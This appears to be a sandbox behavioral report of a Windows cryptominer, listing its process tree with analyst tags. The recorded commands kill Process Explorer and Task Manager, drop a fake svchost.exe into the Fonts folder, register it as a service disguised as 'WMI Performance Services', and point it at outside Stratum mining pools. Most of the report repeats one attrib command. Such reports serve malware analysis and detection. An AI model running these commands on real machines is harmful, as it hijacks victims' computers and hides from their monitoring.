C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
